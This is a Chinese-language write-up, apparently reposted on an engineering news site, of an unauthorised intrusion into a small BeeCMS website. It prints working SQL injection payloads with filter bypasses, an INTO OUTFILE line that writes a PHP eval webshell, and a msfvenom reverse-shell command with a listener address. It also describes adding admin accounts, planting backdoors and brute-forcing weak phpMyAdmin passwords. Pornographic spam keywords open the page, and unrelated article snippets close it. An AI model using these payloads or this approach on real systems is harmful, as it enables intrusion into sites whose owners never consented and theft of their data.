哈哈哈哈哈操欧洲电影,久草网在线,亚洲久久熟女熟妇视频,麻豆精品色,久久福利在线视频,日韩中文字幕的,淫乱毛视频一区,亚洲成人一二三,中文人妻日韩精品电影

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記錄某一次無意點(diǎn)開的一個(gè)小網(wǎng)站的滲透過程

工程師鄧生 ? 來源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

記錄某一次無意點(diǎn)開的一個(gè)小網(wǎng)站的滲透過程,幸運(yùn)的是搭建平臺(tái)是phpstudy,cms是beecms,beecms有通用漏洞,然后去網(wǎng)上找了資料,成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過程

無意點(diǎn)開一個(gè)網(wǎng)站,發(fā)現(xiàn)網(wǎng)站比較小,且看起來比較老,然后發(fā)現(xiàn)logo沒有改,于是乎去百度搜索這個(gè)cms,發(fā)現(xiàn)有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運(yùn)氣比較好,沒有更改后臺(tái)地址,還是默認(rèn)地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞,直接輸入admin’,然后就會(huì)報(bào)錯(cuò),這里用萬能密碼不能登陸,看來還是得通過上面得通用漏洞來進(jìn)行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁面返回正常,從而可以判斷有sql注入,這里采用雙寫進(jìn)行繞過a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發(fā)現(xiàn)這個(gè)注入點(diǎn)后,就有各種各樣的注入方式了,通過sql語句寫入一句話,sqlmap一把梭,手工注入得到賬號(hào)密碼等等,怎么方便怎么來,這里我把幾種方法都寫一下,看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭,dump出管理員賬號(hào)密碼,進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭,發(fā)現(xiàn)并沒有,使用腳本也沒有繞過

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發(fā)現(xiàn)寫入失敗,前面講到有防護(hù),這里通過hex編碼或者char函數(shù)繞過

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對(duì)shell部分進(jìn)行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x,看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜,運(yùn)氣好,默認(rèn)目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來就是后滲透階段,后面會(huì)講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數(shù)繞過:mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫入

1.寫入成功后,菜刀可以連接,我們?cè)L問寫入的文件,驚奇的發(fā)現(xiàn)竟然有admin,和一串md5碼,大膽猜測可能是后臺(tái)賬號(hào)和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺(tái)找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過whoami查看權(quán)限,發(fā)現(xiàn)是admin權(quán)限,但是不是最高權(quán)限,我們要提到最高權(quán)限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過msf生成木馬提權(quán),payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬,并執(zhí)行。執(zhí)行之前打開msf使用模塊use exploit/multi/handler,設(shè)置相應(yīng)參數(shù),然后開始監(jiān)聽

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問題,用這個(gè)沒有成功,那么只能通過大馬提權(quán)了

方法二

1.上傳大馬,此處應(yīng)該有狗或者盾之類的,用的免殺,成功上傳

2.訪問大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權(quán)方式很多,就不細(xì)說了,有大馬之后很多操作都可以引刃而解了,開放端口,添加賬號(hào),留后門。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后,登陸服務(wù)器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發(fā)現(xiàn)

通過掃描目錄,還發(fā)現(xiàn)有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過phpmyadmin登陸,發(fā)現(xiàn)是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結(jié) 1.前臺(tái)sql注入獲取用戶名密碼,進(jìn)入后臺(tái)找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此,滲透結(jié)束。


審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    807

    瀏覽量

    46940
  • 編碼
    +關(guān)注

    關(guān)注

    6

    文章

    1040

    瀏覽量

    57139
  • ASCII
    +關(guān)注

    關(guān)注

    5

    文章

    172

    瀏覽量

    36826

原文標(biāo)題:實(shí)戰(zhàn) | 一次小網(wǎng)站滲透過程

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    一次調(diào)頻如何影響我們的日常生活?

    守護(hù)者”——一次調(diào)頻。很多人沒聽過它的名字,但它每時(shí)每刻都在默默工作,用毫秒級(jí)的響應(yīng)守護(hù)著我們的日常生活。今天就用大白話聊聊,一次調(diào)頻到底怎么影響我們的日常用電。
    的頭像 發(fā)表于 04-07 14:58 ?570次閱讀
    <b class='flag-5'>一次</b>調(diào)頻如何影響我們的日常生活?

    一次調(diào)頻vs二調(diào)頻,電力調(diào)節(jié)的“兄弟組合”有何不同?

    在電力系統(tǒng)的頻率穩(wěn)定保障體系中,一次調(diào)頻與二調(diào)頻就像對(duì)默契配合的“兄弟組合”:個(gè)沖鋒在前、極速響應(yīng),
    的頭像 發(fā)表于 03-30 15:21 ?732次閱讀
    <b class='flag-5'>一次</b>調(diào)頻vs二<b class='flag-5'>次</b>調(diào)頻,電力調(diào)節(jié)的“兄弟組合”有何不同?

    GD32 usbcdc單片機(jī)從機(jī)只發(fā)送,串口打開第一次自動(dòng)發(fā)最后一次測量的值

    關(guān)閉串口,測量會(huì)兒(還在發(fā)送值),關(guān)閉測量(不發(fā)值),此時(shí)打開串口,按理來說應(yīng)該沒有值,但是會(huì)保留最后一次測量的發(fā)送值,這個(gè)過程完全沒有receive(如果是PC主機(jī)發(fā)單片機(jī)回應(yīng),這是正常的)就只
    發(fā)表于 02-04 10:24

    與軸一次成型的微電機(jī)轉(zhuǎn)子磁鐵

    在微型電機(jī)領(lǐng)域,與軸一次成型的轉(zhuǎn)子磁鐵正逐漸成為種被廣泛采用的結(jié)構(gòu)方案,相比傳統(tǒng)“磁鐵+轉(zhuǎn)軸后裝配”的形式,這類轉(zhuǎn)子在結(jié)構(gòu)、性能和致性方面都有明顯優(yōu)勢,特別適合對(duì)體積、精度和可靠性要求較高的微電機(jī)應(yīng)用。
    的頭像 發(fā)表于 01-27 11:40 ?479次閱讀
    與軸<b class='flag-5'>一次</b>成型的微電機(jī)轉(zhuǎn)子磁鐵

    如何判斷一次消諧器是否工作正常?

    判斷一次消諧器是否正常,其實(shí)就看它有沒有“扛住”系統(tǒng)電壓、及時(shí)“泄放”諧振能量,同時(shí)自己保持“健康”狀態(tài)。核心方法是?外觀檢查、電氣參數(shù)測試和運(yùn)行狀態(tài)觀察?三管齊下。
    的頭像 發(fā)表于 01-22 10:27 ?347次閱讀
    如何判斷<b class='flag-5'>一次</b>消諧器是否工作正常?

    光伏一次調(diào)頻設(shè)備/一次調(diào)頻裝置|光伏一次調(diào)頻涉網(wǎng)試驗(yàn)/光伏電站一次調(diào)頻建設(shè)改造方案

    2025年以來能源局下發(fā)通知要求10KV以上的新能源廠站要具備一次調(diào)頻能力,并遞交涉網(wǎng)試驗(yàn)報(bào)告。對(duì)于投資規(guī)模不大的工商業(yè)分布式光伏電站,又要面臨改造投資問題,壓力較大。如何選擇質(zhì)優(yōu)價(jià)廉的一次調(diào)頻產(chǎn)品
    的頭像 發(fā)表于 01-17 08:54 ?1636次閱讀
    光伏<b class='flag-5'>一次</b>調(diào)頻設(shè)備/<b class='flag-5'>一次</b>調(diào)頻裝置|光伏<b class='flag-5'>一次</b>調(diào)頻涉網(wǎng)試驗(yàn)/光伏電站<b class='flag-5'>一次</b>調(diào)頻建設(shè)改造方案

    光伏一次調(diào)頻設(shè)備,光伏電站一次調(diào)頻建設(shè)改造方案

    地控制機(jī)組有功功率的增減,限制電網(wǎng)頻率變化,使電網(wǎng)頻率維持穩(wěn)定的自動(dòng)控制過程。當(dāng)電網(wǎng)頻率升高時(shí),一次調(diào)頻功能要求機(jī)組快速減少有功功率的輸出,反之,當(dāng)電網(wǎng)頻率下降時(shí),一次調(diào)頻裝置就會(huì)減少發(fā)電機(jī)組有功功率
    發(fā)表于 01-16 20:06

    電網(wǎng)頻率為何不能亂?一次調(diào)頻裝置的“維穩(wěn)”邏輯

    家電故障,大到電網(wǎng)崩潰,都會(huì)給生產(chǎn)生活帶來致命影響。而一次調(diào)頻裝置,正是守護(hù)這條“標(biāo)準(zhǔn)線”的核心力量,用毫秒級(jí)響應(yīng)筑牢電網(wǎng)頻率的“維穩(wěn)”防線,詳細(xì)了解一次調(diào)頻裝置可咨詢:1.3.7-5.0.0.4-6.2.0.0。今天就來拆解:電網(wǎng)頻率為何不能亂?
    的頭像 發(fā)表于 01-14 11:41 ?401次閱讀
    電網(wǎng)頻率為何不能亂?<b class='flag-5'>一次</b>調(diào)頻裝置的“維穩(wěn)”邏輯

    一次消諧器對(duì)電力系統(tǒng)的核心貢獻(xiàn)

    一次消諧器(又稱 PT 一次消諧裝置)是安裝在電壓互感器一次側(cè)中性點(diǎn)與地之間的非線性電阻設(shè)備,主要應(yīng)用于3-66kV 中性點(diǎn)不接地或經(jīng)消弧線圈接地的中壓配電網(wǎng),對(duì)保障電力系統(tǒng)安全穩(wěn)定運(yùn)行具有不可替代
    的頭像 發(fā)表于 01-07 06:40 ?600次閱讀
    <b class='flag-5'>一次</b>消諧器對(duì)電力系統(tǒng)的核心貢獻(xiàn)

    車間協(xié)議戰(zhàn)爭調(diào)停者:記一次MODBUS TCP與PROFIBUS的融合實(shí)戰(zhàn)

    ?車間協(xié)議戰(zhàn)爭調(diào)停者:記一次MODBUS TCP與PROFIBUS的融合實(shí)戰(zhàn) 去年,我們團(tuán)隊(duì)接到個(gè)改造項(xiàng)目:家大型鋰電池制造廠希望整合其新舊設(shè)備的數(shù)據(jù)流。工廠情況很典型——新建的M
    的頭像 發(fā)表于 12-22 14:10 ?301次閱讀
    車間協(xié)議戰(zhàn)爭調(diào)停者:記<b class='flag-5'>一次</b>MODBUS TCP與PROFIBUS的融合實(shí)戰(zhàn)

    解析一次消諧和二消諧的差異與應(yīng)用場景

    裝置,是兩個(gè)完全不同的產(chǎn)品。 一次消諧器主要是在電壓互感器PT的開口三角處接入非線性電阻,當(dāng)系統(tǒng)發(fā)生鐵磁諧振時(shí),非線性電阻會(huì)迅速動(dòng)作,將諧振能量消耗掉,從而抑制諧振過電壓。這種方式直接作用于一次系統(tǒng),能快速有效的消
    的頭像 發(fā)表于 12-11 11:33 ?654次閱讀

    固定式測斜儀多久需要校準(zhǔn)一次?

    多數(shù)工程環(huán)境下,固定式測斜儀應(yīng)每12個(gè)月進(jìn)行一次全面校準(zhǔn)。對(duì)于滑坡體監(jiān)測、深基坑等高危場景,因位移數(shù)據(jù)直接影響預(yù)警決策,建議縮短至每6個(gè)月校準(zhǔn)一次。新設(shè)備首次安裝
    的頭像 發(fā)表于 08-13 14:47 ?906次閱讀
    固定式測斜儀多久需要校準(zhǔn)<b class='flag-5'>一次</b>?

    adxl355讀數(shù)異常,三軸中某一軸數(shù)據(jù)始終為0怎么解決?

    adxl355芯片,我這邊做了批設(shè)備,開始全部工作正常,后續(xù)有一次經(jīng)拆裝后,個(gè)別出現(xiàn)了三軸中某一軸讀數(shù)全為0的情況,其余兩軸讀數(shù)正常(還有一個(gè)
    發(fā)表于 08-13 07:32

    智能客服驅(qū)動(dòng)效率和體驗(yàn)升級(jí),上海電信+昇騰AI的一次民生應(yīng)用實(shí)踐

    上海電信+昇騰AI的一次民生應(yīng)用實(shí)踐
    的頭像 發(fā)表于 07-30 23:44 ?3083次閱讀
    智能客服驅(qū)動(dòng)效率和體驗(yàn)升級(jí),上海電信+昇騰AI的<b class='flag-5'>一次</b>民生應(yīng)用實(shí)踐

    一次消諧裝置與二消諧裝置區(qū)別、一次消諧器與二消諧器的區(qū)別

    一次消諧器與二消諧器是電力系統(tǒng)中用于抑制諧振過電壓的不同裝置,主要區(qū)別如下: 安裝位置:一次消諧器串聯(lián)于電壓互感器(PT)一次側(cè)中性點(diǎn)與地之間,直接承受高電壓;二
    的頭像 發(fā)表于 05-07 09:58 ?4919次閱讀
    <b class='flag-5'>一次</b>消諧裝置與二<b class='flag-5'>次</b>消諧裝置區(qū)別、<b class='flag-5'>一次</b>消諧器與二<b class='flag-5'>次</b>消諧器的區(qū)別
    聂拉木县| 彭泽县| 绥阳县| 雅江县| 通城县| 新余市| 阳城县| 府谷县| 邹平县| 密云县| 灌阳县| 绥棱县| 紫阳县| 临沂市| 芷江| 平昌县| 靖江市| 新和县| 平度市| 和林格尔县| 星座| 保康县| 建平县| 石门县| 东丽区| 梁山县| 福贡县| 昌平区| 海盐县| 黄冈市| 拉孜县| 澳门| 华坪县| 绥棱县| 齐河县| 华阴市| 天津市| 伊金霍洛旗| 科技| 丽水市| 阳新县|